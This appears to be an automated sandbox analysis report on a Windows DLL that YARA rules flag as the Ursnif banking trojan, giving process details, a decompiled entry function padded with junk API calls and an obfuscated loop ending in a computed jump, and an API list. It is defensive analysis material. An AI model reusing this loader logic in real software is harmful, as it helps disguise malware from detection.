Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff60c690000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5508 Parent PID: 5764 loaddll32.exeCOMMON

Executed Functions

Function 100181C0, Relevance: 622.4, APIs: 353, Strings: 2, Instructions: 1186
clipboardfilewindowCOMMON

Download Yara Rule

C-Code - Quality: 49%

			_entry_() {
				intOrPtr _v8;
				struct HDC__* _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				int _v24;
				intOrPtr _v28;
				struct HWND__* _v32;
				struct HDC__* _v36;
				struct HDC__* _v40;
				struct HICON__* _v44;
				struct HDC__* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				struct HICON__* _v60;
				struct HDC__* _v64;
				intOrPtr _v68;
				intOrPtr _t842;
				intOrPtr _t854;
				intOrPtr _t856;
				intOrPtr _t857;
				intOrPtr _t980;
				intOrPtr _t984;
				intOrPtr _t1102;
				intOrPtr _t1103;
				intOrPtr _t1105;
				intOrPtr _t1107;
				void* _t1108;
				void* _t1110;
				void* _t1122;
				void* _t1124;

				_v12 = 1;
				_v8 = 0;
				 *0x10035610 =  *((intOrPtr*)(_t1107 + 8));
				 *0x100355f0 = _t1107;
				_v40 = 1;
				_v48 = 1;
				_v64 = 1;
				_v24 = 1;
				_v36 = 1;
				_v44 = 1;
				_v60 = 1;
				_v20 = 1;
				_v32 = 1;
				_v52 = 1;
				_v28 = 1;
				_v56 = 1;
				_v16 = 1;
				DestroyCursor(_v44);
				CreateMetaFileA(" "); // executed
				CloseFigure(_v52);
				AbortPath(_v24);
				DestroyCursor(_v60);
				GetMapMode(_v44);
				CharUpperW(L"FYXNKJBBJP");
				OpenIcon(_v32);
				CharNextA("rlGoyLNdfO"); // executed
				GdiGetBatchLimit();
				GetClipboardOwner();
				__imp__IsGUIThread(_v28);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				GetClipboardData(_v24);
				 *0x10035624 = 0; // executed
				E10013500(); // executed
				 *0x10035618 = E10012EB0();
				_push(1);
				 *0x100355d8 = E100130A0(_v24);
				_push(0x199b); // executed
				E10013020(); // executed
				_t1110 = _t1108 + 8;
				 *0x100355fc = 0;
				_t842 =  *0x100355fc; // 0xc222
				 *0x10035600 = _t842;
				 *0x100355f8 = 0x2e;
				while(1) {
					_v68 = 0;
					_push(1);
					_push(1);
					 *0x10035634 = E10012F00();
					_push(1);
					_push(1);
					 *0x10035634 = E10012F00();
					_push(1);
					_push(1);
					 *0x10035634 = E10012F00();
					_push(1);
					_push(1);
					 *0x10035634 = E10012F00();
					_push(1);
					_push(1);
					 *0x10035634 = E10012F00();
					_push(1);
					_push(1);
					 *0x10035634 = E10012F00();
					_push(1);
					_push(1);
					 *0x10035634 = E10012F00();
					_push(1);
					_push(1);
					 *0x10035634 = E10012F00();
					_push(1);
					_push(1);
					 *0x10035634 = E10012F00();
					_push(1);
					_push(1);
					 *0x10035634 = E10012F00();
					_push(1);
					_push(1);
					 *0x10035634 = E10012F00();
					_push(1);
					_push(1);
					_t854 = E10012F00();
					_t1122 = _t1110 + 0x60;
					 *0x10035634 = _t854;
					_t980 =  *0x100355fc; // 0xc222
					_t1124 = _t980 -  *0x100355d8; // 0xc200
					if(_t1124 >= 0) {
						break;
					}
					_push(0x6f6af);
					E10018100();
					_t1110 = _t1122 + 4;
					_t1102 =  *0x100336ac; // 0x63
					_t856 =  *0x100355f8; // 0x2e
					_t367 = _t1102 + 0x99e; // 0x9cc
					 *0x10035600 = _t856 + _t367 -  *0x10035638 +  *0x10035600;
					_t1103 =  *0x10035600; // 0x11c56
					 *0x10035600 = _t1103 - 0x99e;
					_t857 =  *0x100336ac; // 0x63
					 *0x100355fc = _t857 +  *0x10035638 +  *0x100355fc;
					_t984 =  *0x100355e0; // 0x41
					_t1105 =  *0x100355dc; // 0x0
					 *0x100355dc = _t1105 - _t984 + _v68;
					if(0x13de4355 != 0) {
						continue;
					}
					L6:
					_push(0x9da2a);
					_push(0x11ac);
					E100130E0();
					goto __eax;
				}
				goto L6;
			}

0x100181c6
0x100181cd
0x100181d9
0x100181df
0x100181e5
0x100181ec
0x100181f3
0x100181fa
0x10018201
0x10018208
0x1001820f
0x10018216
0x1001821d
0x10018224
0x1001822b
0x10018232
0x10018239
0x10018244
0x1001824f
0x10018259
0x10018263
0x1001826d
0x10018277
0x10018282
0x1001828c
0x10018297
0x1001829d
0x100182a3
0x100182ad
0x100182b7
0x100182c1
0x100182cb
0x100182d5
0x100182df
0x100182e9
0x100182f3
0x100182fd
0x10018307
0x10018311
0x1001831b
0x10018325
0x1001832f
0x10018339
0x10018343
0x1001834d
0x10018357
0x10018361
0x1001836b
0x10018375
0x1001837f
0x10018389
0x10018393
0x1001839d
0x100183a7
0x100183b1
0x100183bb
0x100183c5
0x100183cf
0x100183d9
0x100183e3
0x100183ed
0x100183f7
0x10018401
0x1001840b
0x10018415
0x1001841f
0x10018429
0x10018433
0x1001843d
0x10018447
0x10018451
0x1001845b
0x10018465
0x1001846f
0x10018479
0x10018483
0x1001848d
0x10018497
0x100184a1
0x100184ab
0x100184b5
0x100184bf
0x100184c9
0x100184d3
0x100184dd
0x100184e7
0x100184f1
0x100184fb
0x10018505
0x1001850f
0x10018519
0x10018523
0x1001852d
0x10018537
0x10018541
0x1001854b
0x10018555
0x1001855f
0x10018569
0x10018573
0x1001857d
0x10018587
0x10018591
0x1001859b
0x100185a5
0x100185af
0x100185b9
0x100185c3
0x100185cd
0x100185d7
0x100185e1
0x100185eb
0x100185f5
0x100185ff
0x10018609
0x10018613
0x1001861d
0x10018627
0x10018631
0x1001863b
0x10018645
0x1001864f
0x10018659
0x10018663
0x1001866d
0x10018677
0x10018681
0x1001868b
0x10018695
0x1001869f
0x100186a9
0x100186b3
0x100186bd
0x100186c7
0x100186d1
0x100186db
0x100186e5
0x100186ef
0x100186f9
0x10018703
0x1001870d
0x10018717
0x10018721
0x1001872b
0x10018735
0x1001873f
0x10018749
0x10018753
0x1001875d
0x10018767
0x10018771
0x1001877b
0x10018785
0x1001878f
0x10018799
0x100187a3
0x100187ad
0x100187b7
0x100187c1
0x100187cb
0x100187d5
0x100187df
0x100187e9
0x100187f3
0x100187fd
0x10018807
0x10018811
0x1001881b
0x10018825
0x1001882f
0x10018839
0x10018843
0x1001884d
0x10018857
0x10018861
0x1001886b
0x10018875
0x1001887f
0x10018889
0x10018893
0x1001889d
0x100188a7
0x100188b1
0x100188bb
0x100188c5
0x100188cf
0x100188d9
0x100188e3
0x100188ed
0x100188f7
0x10018901
0x1001890b
0x10018915
0x1001891f
0x10018929
0x10018933
0x1001893d
0x10018947
0x10018951
0x1001895b
0x10018965
0x1001896f
0x10018979
0x10018983
0x1001898d
0x10018997
0x100189a1
0x100189ab
0x100189b5
0x100189bf
0x100189c9
0x100189d3
0x100189dd
0x100189e7
0x100189f1
0x100189fb
0x10018a05
0x10018a0f
0x10018a19
0x10018a23
0x10018a2d
0x10018a37
0x10018a41
0x10018a4b
0x10018a55
0x10018a5f
0x10018a69
0x10018a73
0x10018a7d
0x10018a87
0x10018a91
0x10018a9b
0x10018aa5
0x10018aaf
0x10018ab9
0x10018ac3
0x10018acd
0x10018ad7
0x10018ae1
0x10018aeb
0x10018af5
0x10018aff
0x10018b09
0x10018b13
0x10018b1d
0x10018b27
0x10018b31
0x10018b3b
0x10018b45
0x10018b4f
0x10018b59
0x10018b63
0x10018b6d
0x10018b77
0x10018b81
0x10018b8b
0x10018b95
0x10018b9f
0x10018ba9
0x10018bb3
0x10018bbd
0x10018bc7
0x10018bd1
0x10018bdb
0x10018be5
0x10018bef
0x10018bf9
0x10018c03
0x10018c0d
0x10018c17
0x10018c21
0x10018c2b
0x10018c35
0x10018c3f
0x10018c49
0x10018c53
0x10018c5d
0x10018c67
0x10018c71
0x10018c7b
0x10018c85
0x10018c8f
0x10018c99
0x10018ca3
0x10018cad
0x10018cb7
0x10018cc1
0x10018ccb
0x10018cd5
0x10018cdf
0x10018ce9
0x10018cf3
0x10018cfd
0x10018d07
0x10018d11
0x10018d1b
0x10018d25
0x10018d2f
0x10018d39
0x10018d43
0x10018d4d
0x10018d57
0x10018d61
0x10018d6b
0x10018d75
0x10018d7f
0x10018d89
0x10018d93
0x10018d9d
0x10018da7
0x10018db1
0x10018dbb
0x10018dc5
0x10018dcf
0x10018dd9
0x10018de3
0x10018ded
0x10018df7
0x10018e01
0x10018e0b
0x10018e15
0x10018e1f
0x10018e29
0x10018e33
0x10018e3d
0x10018e47
0x10018e51
0x10018e5b
0x10018e65
0x10018e6f
0x10018e79
0x10018e83
0x10018e8d
0x10018e97
0x10018ea1
0x10018eab
0x10018eb5
0x10018ebf
0x10018ec9
0x10018ed3
0x10018edd
0x10018ee7
0x10018ef1
0x10018efb
0x10018f05
0x10018f0f
0x10018f19
0x10018f23
0x10018f2d
0x10018f37
0x10018f41
0x10018f4b
0x10018f55
0x10018f5f
0x10018f69
0x10018f73
0x10018f7d
0x10018f87
0x10018f91
0x10018f9b
0x10018fa5
0x10018faf
0x10018fb9
0x10018fc3
0x10018fcd
0x10018fd7
0x10018fe1
0x10018feb
0x10018ff5
0x10018fff
0x10019005
0x1001900f
0x10019019
0x1001901e
0x10019028
0x1001902d
0x10019032
0x10019037
0x1001903c
0x10019046
0x1001904b
0x10019050
0x1001905a
0x1001905a
0x10019061
0x10019063
0x1001906d
0x10019072
0x10019074
0x1001907e
0x10019083
0x10019085
0x1001908f
0x10019094
0x10019096
0x100190a0
0x100190a5
0x100190a7
0x100190b1
0x100190b6
0x100190b8
0x100190c2
0x100190c7
0x100190c9
0x100190d3
0x100190d8
0x100190da
0x100190e4
0x100190e9
0x100190eb
0x100190f5
0x100190fa
0x100190fc
0x10019106
0x1001910b
0x1001910d
0x10019117
0x1001911c
0x1001911e
0x10019120
0x10019125
0x10019128
0x1001912d
0x10019133
0x10019139
0x00000000
0x00000000
0x1001913f
0x10019144
0x10019149
0x1001914c
0x10019152
0x10019157
0x1001916a
0x10019170
0x1001917c
0x10019182
0x10019193
0x10019198
0x100191a1
0x100191a9
0x100191b6
0x00000000
0x00000000
0x100191bc
0x100191bc
0x100191c1
0x100191c6
0x100191d3
0x100191d3
0x00000000

APIs

DestroyCursor.USER32(00000001), ref: 10018244
CreateMetaFileA.GDI32(1003444C), ref: 1001824F
CloseFigure.GDI32(00000001), ref: 10018259
AbortPath.GDI32(00000001), ref: 10018263
DestroyCursor.USER32(00000001), ref: 1001826D
GetMapMode.GDI32(00000001), ref: 10018277
CharUpperW.USER32(FYXNKJBBJP), ref: 10018282
OpenIcon.USER32(00000001), ref: 1001828C
CharNextA.USER32(rlGoyLNdfO), ref: 10018297
GdiGetBatchLimit.GDI32 ref: 1001829D
GetClipboardOwner.USER32 ref: 100182A3
IsGUIThread.USER32(00000001), ref: 100182AD
GetClipboardData.USER32 ref: 100182B7
GetClipboardData.USER32 ref: 100182C1
GetClipboardData.USER32 ref: 100182CB
GetClipboardData.USER32 ref: 100182D5
GetClipboardData.USER32 ref: 100182DF
GetClipboardData.USER32 ref: 100182E9
GetClipboardData.USER32 ref: 100182F3
GetClipboardData.USER32 ref: 100182FD
GetClipboardData.USER32 ref: 10018307
GetClipboardData.USER32 ref: 10018311
GetClipboardData.USER32 ref: 1001831B
GetClipboardData.USER32 ref: 10018325
GetClipboardData.USER32 ref: 1001832F
GetClipboardData.USER32 ref: 10018339
GetClipboardData.USER32 ref: 10018343
GetClipboardData.USER32 ref: 1001834D
GetClipboardData.USER32 ref: 10018357
GetClipboardData.USER32 ref: 10018361
GetClipboardData.USER32 ref: 1001836B
GetClipboardData.USER32 ref: 10018375
GetClipboardData.USER32 ref: 1001837F
GetClipboardData.USER32 ref: 10018389
GetClipboardData.USER32 ref: 10018393
GetClipboardData.USER32 ref: 1001839D
GetClipboardData.USER32 ref: 100183A7
GetClipboardData.USER32 ref: 100183B1
GetClipboardData.USER32 ref: 100183BB
GetClipboardData.USER32 ref: 100183C5
GetClipboardData.USER32 ref: 100183CF
GetClipboardData.USER32 ref: 100183D9
GetClipboardData.USER32 ref: 100183E3
GetClipboardData.USER32 ref: 100183ED
GetClipboardData.USER32 ref: 100183F7
GetClipboardData.USER32 ref: 10018401
GetClipboardData.USER32 ref: 1001840B
GetClipboardData.USER32 ref: 10018415
GetClipboardData.USER32 ref: 1001841F
GetClipboardData.USER32 ref: 10018429
GetClipboardData.USER32 ref: 10018433
GetClipboardData.USER32 ref: 1001843D
GetClipboardData.USER32 ref: 10018447
GetClipboardData.USER32 ref: 10018451
GetClipboardData.USER32 ref: 1001845B
GetClipboardData.USER32 ref: 10018465
GetClipboardData.USER32 ref: 1001846F
GetClipboardData.USER32 ref: 10018479
GetClipboardData.USER32 ref: 10018483
GetClipboardData.USER32 ref: 1001848D
GetClipboardData.USER32 ref: 10018497
GetClipboardData.USER32 ref: 100184A1
GetClipboardData.USER32 ref: 100184AB
GetClipboardData.USER32 ref: 100184B5
GetClipboardData.USER32 ref: 100184BF
GetClipboardData.USER32 ref: 100184C9
GetClipboardData.USER32 ref: 100184D3
GetClipboardData.USER32 ref: 100184DD
GetClipboardData.USER32 ref: 100184E7
GetClipboardData.USER32 ref: 100184F1
GetClipboardData.USER32 ref: 100184FB
GetClipboardData.USER32 ref: 10018505
GetClipboardData.USER32 ref: 1001850F
GetClipboardData.USER32 ref: 10018519
GetClipboardData.USER32 ref: 10018523
GetClipboardData.USER32 ref: 1001852D
GetClipboardData.USER32 ref: 10018537
GetClipboardData.USER32 ref: 10018541
GetClipboardData.USER32 ref: 1001854B
GetClipboardData.USER32 ref: 10018555
GetClipboardData.USER32 ref: 1001855F
GetClipboardData.USER32 ref: 10018569
GetClipboardData.USER32 ref: 10018573
GetClipboardData.USER32 ref: 1001857D
GetClipboardData.USER32 ref: 10018587
GetClipboardData.USER32 ref: 10018591
GetClipboardData.USER32 ref: 1001859B
GetClipboardData.USER32 ref: 100185A5
GetClipboardData.USER32 ref: 100185AF
GetClipboardData.USER32 ref: 100185B9
GetClipboardData.USER32 ref: 100185C3
GetClipboardData.USER32 ref: 100185CD
GetClipboardData.USER32 ref: 100185D7
GetClipboardData.USER32 ref: 100185E1
GetClipboardData.USER32 ref: 100185EB
GetClipboardData.USER32 ref: 100185F5
GetClipboardData.USER32 ref: 100185FF
GetClipboardData.USER32 ref: 10018609
GetClipboardData.USER32 ref: 10018613
GetClipboardData.USER32 ref: 1001861D
GetClipboardData.USER32 ref: 10018627
GetClipboardData.USER32 ref: 10018631
GetClipboardData.USER32 ref: 1001863B
GetClipboardData.USER32 ref: 10018645
GetClipboardData.USER32 ref: 1001864F
GetClipboardData.USER32 ref: 10018659
GetClipboardData.USER32 ref: 10018663
GetClipboardData.USER32 ref: 1001866D
GetClipboardData.USER32 ref: 10018677
GetClipboardData.USER32 ref: 10018681
GetClipboardData.USER32 ref: 1001868B
GetClipboardData.USER32 ref: 10018695
GetClipboardData.USER32 ref: 1001869F
GetClipboardData.USER32 ref: 100186A9
GetClipboardData.USER32 ref: 100186B3
GetClipboardData.USER32 ref: 100186BD
GetClipboardData.USER32 ref: 100186C7
GetClipboardData.USER32 ref: 100186D1
GetClipboardData.USER32 ref: 100186DB
GetClipboardData.USER32 ref: 100186E5
GetClipboardData.USER32 ref: 100186EF
GetClipboardData.USER32 ref: 100186F9
GetClipboardData.USER32 ref: 10018703
GetClipboardData.USER32 ref: 1001870D
GetClipboardData.USER32 ref: 10018717
GetClipboardData.USER32 ref: 10018721
GetClipboardData.USER32 ref: 1001872B
GetClipboardData.USER32 ref: 10018735
GetClipboardData.USER32 ref: 1001873F
GetClipboardData.USER32 ref: 10018749
GetClipboardData.USER32 ref: 10018753
GetClipboardData.USER32 ref: 1001875D
GetClipboardData.USER32 ref: 10018767
GetClipboardData.USER32 ref: 10018771
GetClipboardData.USER32 ref: 1001877B
GetClipboardData.USER32 ref: 10018785
GetClipboardData.USER32 ref: 1001878F
GetClipboardData.USER32 ref: 10018799
GetClipboardData.USER32 ref: 100187A3
GetClipboardData.USER32 ref: 100187AD
GetClipboardData.USER32 ref: 100187B7
GetClipboardData.USER32 ref: 100187C1
GetClipboardData.USER32 ref: 100187CB
GetClipboardData.USER32 ref: 100187D5
GetClipboardData.USER32 ref: 100187DF
GetClipboardData.USER32 ref: 100187E9
GetClipboardData.USER32 ref: 100187F3
GetClipboardData.USER32 ref: 100187FD
GetClipboardData.USER32 ref: 10018807
GetClipboardData.USER32 ref: 10018811
GetClipboardData.USER32 ref: 1001881B
GetClipboardData.USER32 ref: 10018825
GetClipboardData.USER32 ref: 1001882F
GetClipboardData.USER32 ref: 10018839
GetClipboardData.USER32 ref: 10018843
GetClipboardData.USER32 ref: 1001884D
GetClipboardData.USER32 ref: 10018857
GetClipboardData.USER32 ref: 10018861
GetClipboardData.USER32 ref: 1001886B
GetClipboardData.USER32 ref: 10018875
GetClipboardData.USER32 ref: 1001887F
GetClipboardData.USER32 ref: 10018889
GetClipboardData.USER32 ref: 10018893
GetClipboardData.USER32 ref: 1001889D
GetClipboardData.USER32 ref: 100188A7
GetClipboardData.USER32 ref: 100188B1
GetClipboardData.USER32 ref: 100188BB
GetClipboardData.USER32 ref: 100188C5
GetClipboardData.USER32 ref: 100188CF
GetClipboardData.USER32 ref: 100188D9
GetClipboardData.USER32 ref: 100188E3
GetClipboardData.USER32 ref: 100188ED
GetClipboardData.USER32 ref: 100188F7
GetClipboardData.USER32 ref: 10018901
GetClipboardData.USER32 ref: 1001890B
GetClipboardData.USER32 ref: 10018915
GetClipboardData.USER32 ref: 1001891F
GetClipboardData.USER32 ref: 10018929
GetClipboardData.USER32 ref: 10018933
GetClipboardData.USER32 ref: 1001893D
GetClipboardData.USER32 ref: 10018947
GetClipboardData.USER32 ref: 10018951
GetClipboardData.USER32 ref: 1001895B
GetClipboardData.USER32 ref: 10018965
GetClipboardData.USER32 ref: 1001896F
GetClipboardData.USER32 ref: 10018979
GetClipboardData.USER32 ref: 10018983
GetClipboardData.USER32 ref: 1001898D
GetClipboardData.USER32 ref: 10018997
GetClipboardData.USER32 ref: 100189A1
GetClipboardData.USER32 ref: 100189AB
GetClipboardData.USER32 ref: 100189B5
GetClipboardData.USER32 ref: 100189BF
GetClipboardData.USER32 ref: 100189C9
GetClipboardData.USER32 ref: 100189D3
GetClipboardData.USER32 ref: 100189DD
GetClipboardData.USER32 ref: 100189E7
GetClipboardData.USER32 ref: 100189F1
GetClipboardData.USER32 ref: 100189FB
GetClipboardData.USER32 ref: 10018A05
GetClipboardData.USER32 ref: 10018A0F
GetClipboardData.USER32 ref: 10018A19
GetClipboardData.USER32 ref: 10018A23
GetClipboardData.USER32 ref: 10018A2D
GetClipboardData.USER32 ref: 10018A37
GetClipboardData.USER32 ref: 10018A41
GetClipboardData.USER32 ref: 10018A4B
GetClipboardData.USER32 ref: 10018A55
GetClipboardData.USER32 ref: 10018A5F
GetClipboardData.USER32 ref: 10018A69
GetClipboardData.USER32 ref: 10018A73
GetClipboardData.USER32 ref: 10018A7D
GetClipboardData.USER32 ref: 10018A87
GetClipboardData.USER32 ref: 10018A91
GetClipboardData.USER32 ref: 10018A9B
GetClipboardData.USER32 ref: 10018AA5
GetClipboardData.USER32 ref: 10018AAF
GetClipboardData.USER32 ref: 10018AB9
GetClipboardData.USER32 ref: 10018AC3
GetClipboardData.USER32 ref: 10018ACD
GetClipboardData.USER32 ref: 10018AD7
GetClipboardData.USER32 ref: 10018AE1
GetClipboardData.USER32 ref: 10018AEB
GetClipboardData.USER32 ref: 10018AF5
GetClipboardData.USER32 ref: 10018AFF
GetClipboardData.USER32 ref: 10018B09
GetClipboardData.USER32 ref: 10018B13
GetClipboardData.USER32 ref: 10018B1D
GetClipboardData.USER32 ref: 10018B27
GetClipboardData.USER32 ref: 10018B31
